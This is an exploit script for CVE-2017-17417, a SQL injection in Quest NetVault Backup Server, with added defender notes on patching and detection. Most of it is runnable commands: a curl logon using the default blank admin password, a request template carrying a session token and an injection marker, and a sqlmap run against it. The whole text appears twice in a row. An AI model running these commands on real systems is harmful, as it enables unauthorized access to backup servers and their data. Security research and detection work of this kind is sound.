# Exploit Title/Exploit Başlığı: Quest NetVault Backup Server < 11.4.5 Process Manager Service SQL Injection Remote Code Execution Vulnerability (ZDI-17-982)
# Date/Tarih: 2-21-2019
# Exploit Author/Exploit Yazarı: credit goes to rgod for finding the bug
# Version/Versiyon: Quest NetVault Backup Server < 11.4.5
# CVE : CVE-2017-17417
# Run these commands in a Kali terminal.
#
# Flow of this proof of concept, as written: log on to the NetVault web
# service, save an authenticated request template to a file, then hand that
# template to sqlmap to test the "where" field for SQL injection.
#
# Defender notes:
#   - The header above lists Quest NetVault Backup Server < 11.4.5 as
#     affected; upgrading to 11.4.5 or later is the remediation implied
#     (NOTE(review): confirm the fixed build against the vendor/ZDI advisory).
#   - The flow below authenticates first, so a non-blank administrator
#     password and restricted network access to the management port are
#     relevant hardening steps; they do not replace patching.
#   - For detection, review web-service logs for POST /query JSON-RPC calls
#     with method "GET" on class NVBUPhaseStatus whose "where" value is not
#     one the product UI normally sends, especially in rapid, repetitive
#     bursts (boolean-based blind testing issues many near-identical
#     requests).

# Target IP address (placeholder; must be replaced before use).
target=x.x.x.x
# Target port of the HTTPS web service.
port=8443
# Account used for the Logon call.
username=admin
# The password is blank by default.
password=
# Logon call against /query; the session token is pulled out of the response
# by keeping the line that contains "SessionCookie" and taking its fourth
# double-quote-delimited field.
# curl flags: -i include response headers, -s silent, -k skip TLS certificate
# verification (the server certificate is not validated).
cookie=$(curl -i -s -k -X $'POST' -H $'Content-Length: 109' -H $'Content-Type: application/json-rpc; charset=UTF-8' --data-binary "{"jsonrpc":"2.0","method":"Logon","params":{"OutputFormat":"pretty","UserName":"$username","Password":"$password"},"id":1}" "https://$target:$port/query" | grep SessionCookie | cut -d '"' -f4)
# Write a raw HTTP request template to ./dellSqlmap. The heredoc delimiter is
# unquoted, so $target, $port and $cookie are expanded when the file is
# written. The file therefore contains a live session token: treat it as a
# credential and delete it when finished.
# The "*" inside the "where" value is sqlmap's custom injection-point marker.
cat > dellSqlmap <<EOF
POST /query HTTP/1.1
Host: $target:$port
Connection: close
Content-Length: 129
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
SessionCookie: $cookie
Content-Type: application/json-rpc; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"jsonrpc":"2.0","method":"GET","params":{"classname":"NVBUPhaseStatus","updates":"none","where":"1=1*"},"id":1}
EOF
# Run sqlmap against the saved request:
#   -r dellSqlmap    read the HTTP request from the file written above
#   --force-ssl      send it over HTTPS
#   --level=5        highest test level
#   --dbms=postgresql  assume a PostgreSQL back end
#   --prefix/--suffix  empty, so nothing is wrapped around the payload
#   --test-filter    restrict testing to the named boolean-based blind test
#   --batch          never prompt; accept default answers
sqlmap -r dellSqlmap --force-ssl --level=5 --dbms=postgresql --prefix='' --suffix='' --test-filter='AND boolean-based blind - WHERE or HAVING clause' --batch
# Exploit link (source): https://cxsecurity.com/issue/WLB-2019020238
# Date/Tarih: 2-21-2019
# Exploit Author/Exploit Yazarı: credit goes to rgod for finding the bug
# Version/Versiyon: Quest NetVault Backup Server < 11.4.5
# CVE : CVE-2017-17417
# Run these commands in a Kali terminal.
#
# Flow of this proof of concept, as written: log on to the NetVault web
# service, save an authenticated request template to a file, then hand that
# template to sqlmap to test the "where" field for SQL injection.
#
# Defender notes:
#   - The header above lists Quest NetVault Backup Server < 11.4.5 as
#     affected; upgrading to 11.4.5 or later is the remediation implied
#     (NOTE(review): confirm the fixed build against the vendor/ZDI advisory).
#   - The flow below authenticates first, so a non-blank administrator
#     password and restricted network access to the management port are
#     relevant hardening steps; they do not replace patching.
#   - For detection, review web-service logs for POST /query JSON-RPC calls
#     with method "GET" on class NVBUPhaseStatus whose "where" value is not
#     one the product UI normally sends, especially in rapid, repetitive
#     bursts (boolean-based blind testing issues many near-identical
#     requests).

# Target IP address (placeholder; must be replaced before use).
target=x.x.x.x
# Target port of the HTTPS web service.
port=8443
# Account used for the Logon call.
username=admin
# The password is blank by default.
password=
# Logon call against /query; the session token is pulled out of the response
# by keeping the line that contains "SessionCookie" and taking its fourth
# double-quote-delimited field.
# curl flags: -i include response headers, -s silent, -k skip TLS certificate
# verification (the server certificate is not validated).
cookie=$(curl -i -s -k -X $'POST' -H $'Content-Length: 109' -H $'Content-Type: application/json-rpc; charset=UTF-8' --data-binary "{"jsonrpc":"2.0","method":"Logon","params":{"OutputFormat":"pretty","UserName":"$username","Password":"$password"},"id":1}" "https://$target:$port/query" | grep SessionCookie | cut -d '"' -f4)
# Write a raw HTTP request template to ./dellSqlmap. The heredoc delimiter is
# unquoted, so $target, $port and $cookie are expanded when the file is
# written. The file therefore contains a live session token: treat it as a
# credential and delete it when finished.
# The "*" inside the "where" value is sqlmap's custom injection-point marker.
cat > dellSqlmap <<EOF
POST /query HTTP/1.1
Host: $target:$port
Connection: close
Content-Length: 129
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
SessionCookie: $cookie
Content-Type: application/json-rpc; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{"jsonrpc":"2.0","method":"GET","params":{"classname":"NVBUPhaseStatus","updates":"none","where":"1=1*"},"id":1}
EOF
# Run sqlmap against the saved request:
#   -r dellSqlmap    read the HTTP request from the file written above
#   --force-ssl      send it over HTTPS
#   --level=5        highest test level
#   --dbms=postgresql  assume a PostgreSQL back end
#   --prefix/--suffix  empty, so nothing is wrapped around the payload
#   --test-filter    restrict testing to the named boolean-based blind test
#   --batch          never prompt; accept default answers
sqlmap -r dellSqlmap --force-ssl --level=5 --dbms=postgresql --prefix='' --suffix='' --test-filter='AND boolean-based blind - WHERE or HAVING clause' --batch
# Exploit link (source): https://cxsecurity.com/issue/WLB-2019020238